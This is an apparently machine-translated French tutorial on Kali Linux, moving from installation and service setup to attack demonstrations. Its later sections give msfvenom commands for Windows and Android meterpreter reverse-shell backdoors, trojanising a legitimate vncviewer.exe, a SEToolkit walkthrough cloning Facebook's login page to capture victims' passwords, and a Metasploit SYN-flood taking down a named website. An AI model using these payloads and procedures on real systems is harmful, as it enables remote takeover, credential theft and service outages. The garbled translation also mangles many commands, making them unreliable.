Bases Kali Linux

Bases Kali Linux
Kali Linux est une distribution basée sur Debian pour les pirates éthiques, les testeurs de pénétration, les chercheurs en sécurité et les passionnés. Il est stable, mis à jour, prêt à l'entreprise, à la distribution open source et bien entretenue par sécurité offensive. L'environnement de bureau par défaut de Kali Linux est gnome mais il offre également une variété d'autres environnements de bureau, notamment KDE, Mate, LXDE et autres. Il peut être installé sur différents types de systèmes, y compris les ordinateurs portables, les serveurs, les appareils de bras (Raspberry Pi, etc.) et le cloud. Il dispose également d'une version portable pour les appareils Android appelée Nethunter qui peut être utilisée dans le système d'exploitation Android et est livré avec des outils et scripts préinstallés qui offrent une portabilité tout en effectuant des tests d'audit ou de pénétration de sécurité.

Pourquoi tu devrais utiliser Kali Linux?

Kali Linux est principalement utilisé par les testeurs de pénétration, les auditeurs de sécurité, les enquêteurs et les chercheurs en médecine légale. Il a presque tous les outils ou scripts préinstallés qui peuvent être utilisés à l'une des fins ci-dessus. Vous pouvez utiliser Kali Linux pour casser les réseaux WiFi, pour exécuter Open Source Intelligence (OSINT) sur quelqu'un, pour pirater des sites Web et des réseaux et bien d'autres.

Autre que le piratage éthique, Kali Linux a également un ensemble d'outils d'investigation médico-légale. La criminalistique est une autre branche de sécurité importante et émergente dont le but principal est de collecter et d'analyser les preuves d'une activité criminelle, puis de revenir en arrière. L'enquête médico-légale aide à retracer et à éliminer les effets malveillants (bordeaux, malwares) résultant d'une activité criminelle et calculant / manipulant la perte après une cyberattaque. Kali Linux propose un mode furtif distinct pour les opérations de «criminalistique» dans lesquelles il ne laisse aucune empreinte digitale sur le système de l'hôte.

Se mettre à l'aise avec l'environnement de Kali

Kali n'est pas conçu pour les utilisateurs ordinaires et ce n'est pas très convivial comme Windows ou Ubuntu. Son environnement par défaut est Root, ce qui n'est pas très facile à utiliser et est assez dangereux pour les noobs. Il manque également certains services publics de base comme Snap, VirtualBox et d'autres utilitaires utiles qui sont présents dans Ubuntu.

Commençons par le commencement

La première chose à faire est de faire un utilisateur non root

root @ kali: ~ # AddUser Kali
Ajout de l'utilisateur «Kali»…
Ajout d'un nouveau groupe «Kali» (1002)…
Ajout d'un nouvel utilisateur «Kali» (1002) avec le groupe «Kali»…
Création du répertoire de la maison '/ home / kali'…
Copie de fichiers à partir de '/ etc / skel'…
Nouveau mot de passe:
… Snip…
root @ kali: ~ # usermod -ag sudo kali
Initialiser la base de données PostgreSQL de Metasploit Framework
root @ kali: ~ # msfdb init
Création de l'utilisateur de la base de données «MSF»
Entrez le mot de passe pour un nouveau rôle:
Entrez à nouveau:
Création de bases de données «MSF» et «msf_test»
… Snip…

Ajoutez les lignes suivantes à vos sources «/ etc / apt /.Fichier de liste

deb http: // http.kali.org / kali kali-rolling principal contribute non libre
# Pour l'accès aux packages source, décommentez la ligne suivante
# deb-src http: // http.kali.org / kali kali-rolling principal contribute non libre
Installez d'autres outils utiles.
root @ kali: ~ # APT-Get Update && apt mise à niveau -y
root @ kali: ~ # apt-get installer virtualbox virtualbox-dkms gobuster tor tor-browser
openvpn htop atom deepin-terminal Tilix -y

Gérer les services par défaut de Kali

Kali est livré avec de nombreux services non standard préinstallés tels que PostgreSQL, MySQL, SSH, HTTP. S'ils ne sont pas configurés correctement, ces services commenceront comme un processus de fond lorsque votre Kali Linux s'oppose et ces ports ouverts peuvent être une menace pour la sécurité de votre système.

Dans cette section, nous examinerons comment ces services fonctionnent et comment vous pouvez les configurer correctement et comment vous pouvez les utiliser. La façon standard de configurer un outil ou un service est lu son fichier ReadMe Doc. Le fichier ReadMe contient la procédure standard pour configurer et utiliser un outil ou un service. Les fichiers ReadMe sont généralement situés dans le dossier «/ usr / share / doc / [tool_name] / readme».

Secure Shell Service (SSH)

Secure Shell (SSH) est utilisé depuis longtemps comme outil standard pour exécuter à distance des commandes, des fichiers de transfert et d'autres fins d'administration à distance. Le package comprend SSH (client) et SSHD (service) pour contrôler d'autres machines à distance.

Le service SSH n'est pas démarré par défaut lorsque Kali est enracinée, vous pouvez le démarrer en tapant,

root @ kali: ~ $ service ssh start
root @ kali: ~ $ netstat -antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0: * Écoutez 6601 / sshd
TCP6 0 0 ::: 22 ::: * Écoutez 6601 / sshd

Si vous voulez que SSHD commence à chaque fois que votre kali est. Taper

root @ kali: ~ $ update-rc.d ssh activer

Si vous voulez que quelqu'un se connecte à votre PC via SSH, il utilisera le nom d'utilisateur et le mot de passe de votre Kali pour l'authentification de la connexion. Il vaut donc mieux changer votre mot de passe par défaut «TOOR» en quelque chose de sécurisé.

root @ kali: ~ $ passwd
Modification du mot de passe pour root.
Mot de passe actuel:
Nouveau mot de passe:
Re-taper le nouveau mot de passe:
passwd: mot de passe mis à jour avec succès

Maintenant, recharger le service SSH pour affecter les changements

root @ kali: ~ $ service ssh rechargement

Service http

Le service HTTP est très bénéfique tout en effectuant des tâches liées au piratage éthique. Il peut être utilisé pour héberger de fausses pages Web de phishing et un site Web, pour transférer des fichiers vers des serveurs de victimes à distance. Les applications Web devenant de plus en plus populaires chaque jour, il est maintenant plus important d'avoir des connaissances pour comprendre et utiliser des serveurs HTTP comme Apache.

Apache est un serveur HTTP qui est préinstallé à Kali. Le service HTTP d'Apache est désactivé par défaut, mais vous pouvez le démarrer à l'aide de la commande suivante.

root @ kali: ~ $ service apache2 start

Apache hébergera sa page Web Debian par défaut sur votre domaine local au port http standard 80. Aller sur http: // localhost: 80 /

Pour le démarrer à chaque fois que votre kali commence, tapez

root @ kali: ~ $ update-rc.d apache2 activer

Vous pouvez également configurer Apache sur le port non standard en modifiant son fichier de configuration (/ etc / apache2 / ports.conf)

root @ kali: ~ $ nano / etc / apache2 / ports.confli

Enregistrez le fichier puis exécutez

root @ kali: ~ $ service apache2 redémarrer

Maintenant, Apache sera serveur sur le port «1234» au lieu du port standard 80.

Si vous souhaitez lire la documentation complète d'Apache Server, accédez au répertoire «/ usr / share / doc / apache2 /», tapez

root @ kali: ~ $ cd / usr / share / doc / apache2 /
root @ kali: / usr / share / doc / apache2 $ gzip --décompression readme.Debian.gz
root @ kali: / usr / share / doc / apache2 $ nano readme.Debian

Une liste de quelques commandes utiles

Localiser est utilisé pour localiser un fichier dans Linux, avant d'utiliser cette commande, vous devez d'abord mettre à jour votre base de données

root @ kali: ~ # updatedb
root @ kali: ~ # localiser uqjhssvf.jpeg
/ root / uqjhssvf.jpeg

trouver est plus agressif et ne compte pas sur la base de données. Il recherche récursivement le fichier dans le répertoire donné et ses sous-répertoires.

root @ kali: ~ # trouver ./ -Name Main.py
./ Desktop / Main.py

wget peut être utilisé pour télécharger une page Web ou un fichier dans le terminal.

root @ kali: ~ # wget tinytuba.com
--2019-05-11 08: 58: 48-- http: // tinytuba.com /
Résolution de Tinytuba.com (tinytuba.com)… 52.216.129.66
Connexion à Tinytuba.com (tinytuba.com) | 52.216.129.66 |: 80… connecté.
Demande HTTP envoyée, en attente de réponse… 200 ok
Longueur: 1551 (1.5k) [Texte / HTML]
Économie vers: 'Index.html '
indice.HTML 100% [=========================>] 1.51k --.-Kb / s en 0
2019-05-11 08:58:50 (56.5 Mo / s) - 'Index.HTML 'enregistré [1551/1551]
root @ kali: ~ # index firefox.html

haut Vous donne des informations sur votre processeur, votre utilisation de la mémoire et d'autres statistiques.

histoire Affichez la liste des commandes précédentes que vous avez entrées dans votre terminal.

Certaines autres commandes utiles que vous pouvez trouver sur Internet sont LS, RM, RMDIR, ADDUSER, DUTER, SERVICE, NANO, CAT, MORE, Moins, uname, Whoami etc

Générer des dérives malveillantes

Vous pouvez générer des binaires EXE malveillants en utilisant «MSFvenom» Kali Linux et l'installer sur le système de quelqu'un d'autre pour le contrôler à distance.

root @ kali: ~ $ msfvenom -a x86 --platform windows -b '\ x00' -p windows / meterpreter / reverse_tcp
LHOST = [Adresse IP de l'attaquant] lport = [Port de l'attaquant NO] -F EXE> FUN.exe
Trouvé 11 encodeurs compatibles
Tenter de coder la charge utile avec 1 itérations de x86 / shikata_ga_nai
x86 / shikata_ga_nai a réussi avec la taille 368 (itération = 0)
x86 / shikata_ga_nai choisi avec la taille finale 368
Taille de la charge utile: 368 octets
Taille finale du fichier EXE: 73802 octets
root @ kali: ~ $ ls amusant.exe
amusant.exe
root @ kali: ~ $ file fun.exe
amusant.EXE: PE32 EXECTIVATION (GUI) Intel 80386, pour MS Windows

Pour générer une porte dérobée pour X64 Architecture Windows Systems, saisissez la commande suivante.

root @ kali: ~ $ msfvenom - Platform Windows -b '\ x00' -p windows / x64 / meterpreter / reverse_tcp
LHOST = [Adresse IP de l'attaquant] lport = [Port de l'attaquant NO] -F EXE> FUN.exe
[-] Aucune arche sélectionnée, sélectionnant Arch: x64 dans la charge utile
Trouvé 3 encodeurs compatibles
… Snip…
root @ kali: ~ $ file fun.exe
amusant.EXE: PE32 + exécutable (GUI) x86-64, pour MS Windows

Incorporer les délais dans des applications légitimes en utilisant Kali

Vous pouvez également intégrer votre code de porte dérobée malveillant dans un fichier EXE inoffensif comme Adobe Reader Installer ou un exécutable de lecteur multimédia. L'exécutable occupant une résistance à la recherche ressemblera à une application logicielle légitime, mais lorsqu'elle est exécutée sur l'ordinateur de la victime, il exécutera votre porte dérobée malveillante à côté de cette application légitime, entraînant un compromis de la victime du PC de la victime.

Il existe des Windows exécutables déjà présents dans Kali Linux, que nous utiliserons pour démontrer.

root @ kali: ~ $ ls / usr / share / windows-binaires /
BATES DE LA.exe fport / klogger.exe nbtenum / plink.exe vncviewer.exe whoami.exe
Enumplus / Fgdump / Hyperion / Mbenum / NC.radmin exe.exe wget.exe

Nous injecterons notre charge utile dans «vncviewer.EXE »EXECTABLE.

root @ kali: ~ $ msfvenom -a x86 --platform windows -x / usr / share / windows-binaries / vncviewer.exe
-K -p Windows / MeterPreter / Reverse_Tcp Lhost = [IP de l'attaquant] lport = [Port de l'attaquant]
-e x86 / shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Trouvé 1 encodeurs compatibles
Tenter de coder la charge utile avec 3 itérations de x86 / shikata_ga_nai
… Snip…
Taille de la charge utile: 422 octets
Taille finale du fichier EXE: 421376 octets
Enregistré comme: vncviewer.exe

Génération de baignoires Android

Pour contrôler à distance les téléphones Android, vous pouvez générer des fichiers APK malveillants à l'aide de MSFvenom.

root @ kali: ~ $ msfvenom -p android / meterpreter / reverse_tcp lhost = [IP d'attaquant]
LPPORT = [Port de l'attaquant no] r>.apk
[-] Aucune plate-forme n'a été sélectionnée, en choisissant MSF :: Module :: Platform :: Android à partir de la charge utile
[-] Pas d'arc sélectionné, sélectionnant Arch: Dalvik dans la charge utile
Aucun encodeur ou badchars spécifié, sortie de la charge utile brute
Taille de la charge utile: 10087 octets

Ingénierie sociale utilisant Setoolkit

L'ingénierie sociale est l'utilisation de la tromperie pour inciter quelqu'un à révéler ses informations confidentielles ou personnelles qui peuvent être mal utilisées à des fins malveillantes.

La technique de l'ingénierie sociale la plus couramment utilisée est le phishing, dans lequel vous essayez d'envoyer des messages, des e-mails ou des appels téléphoniques pour obtenir des informations personnelles, en particulier les informations liées à l'argent. Dans Phishing Attack, le récepteur d'un e-mail est convaincu qu'il a reçu l'e-mail d'une véritable source telle qu'une banque ou un département du gouvernement, puis a trompé ses informations d'identification sensibles.

Dans cette démonstration, nous allons cloner une page de connexion Facebook à l'aide de Setoolkit et héberger cette page sur notre serveur HTTP, puis nous enverrons l'adresse IP de notre serveur HTTP à la victime. Lorsque la victime se connecte à notre fausse page de connexion Facebook, cette page enverra son nom d'utilisateur et son mot de passe à notre machine Kali.

Taper seroolkit Dans le terminal, Setoolkit sera ouvert

  • Sélectionnez dans le menu: [Sélectionnez 1] Attaques d'ingénierie sociale
  • Sélectionnez dans le menu: [Sélectionnez 2] Vectors d'attaque de site Web
  • Sélectionnez dans le menu: [Sélectionner 3] Méthode d'attaque des réseaux d'identification
  • Sélectionnez dans le menu: [Sélectionner 2] Cloner du site
  • Sélectionnez dans le menu: entrez l'adresse IP de l'ordinateur local
  • Sélectionnez dans le menu: Entrez l'URL au clone: ​​www.Facebook.com
  • Appuyez sur Entrée et Type Y

Lorsque la victime entre dans notre adresse IP dans son navigateur, il sera présenté avec notre fausse page de connexion Facebook que nous avons créée plus tôt. Nous devons attendre que la victime entre son nom d'utilisateur et son mot de passe dans notre page clonée. La fausse page Facebook ressemblera à ceci,

Tant que l'utilisateur entre ses informations d'identification, Setoolkit les affichera sur le terminal.

Cette démo était sur un réseau local, si vous voulez le faire sur une adresse IP publique, vous devez soit effectuer un transfert de port sur votre routeur, soit utiliser Ngrok pour la propriété intellectuelle et le numéro de port publique.

Attaque du déni de service (DOS) à l'aide de métasploit

L'attaque du déni de service (DOS) est un type d'attaque sur un système ou un réseau qui diminue ou restreint l'accessibilité des ressources système à ses utilisateurs légitimes. Le but d'une attaque DOS n'est pas de voler des informations sensibles, l'attaquant essaie plutôt d'inonder le système de victime avec des demandes de service non légitimes pour surcharger ses ressources.

Une attaque de déni de service distribué (DDOS) a besoin d'un grand nombre de systèmes (appelés zombies) attaquant une seule cible, entraînant un déni de service. Une seule attaque DOS ne peut pas affecter les grandes entreprises et les réseaux, c'est pourquoi DDOS est plus efficace et mortel. Il est également difficile de retracer et de bloquer l'attaque DDOS car des centaines et des milliers de systèmes de zombies attaquent un seul hôte.

Ce sont de nombreux outils et scripts disponibles pour les attaques DOS et DDOS, mais nous utiliserons un module auxiliaire de métasploit pour la démonstration. Nous essaierons de supprimer un exemple de site Web «www.jarusa.com ».

Tout d'abord, allez sur https: // www.isitdownrightnow.com / et confirmer que le site Web est opérationnel

Le site Web est en place. Maintenant, ouvrez la console du cadre Metasploit dans votre terminal.

root @ kali: ~ $ msfconsole
… Snip…
MSF5> Utilisez les axuaires / dos / TCP / Synflood

Découvrir www.jarusa.comAdresse IP et définissez-la comme rhost, puis exécutez l'attaque

Après un certain temps, vous verrez que le site Web n'est pas disponible. Confirmez-le en utilisant https: // www.isitdownrightnow.com /

CONCLUSION

Kali Linux est une maison pour les pirates éthiques et ce tutoriel vous a, espérons-le, vous a éclairé les bases de Kali Linux, ce qu'elle peut faire et comment commencer avec son utilisation.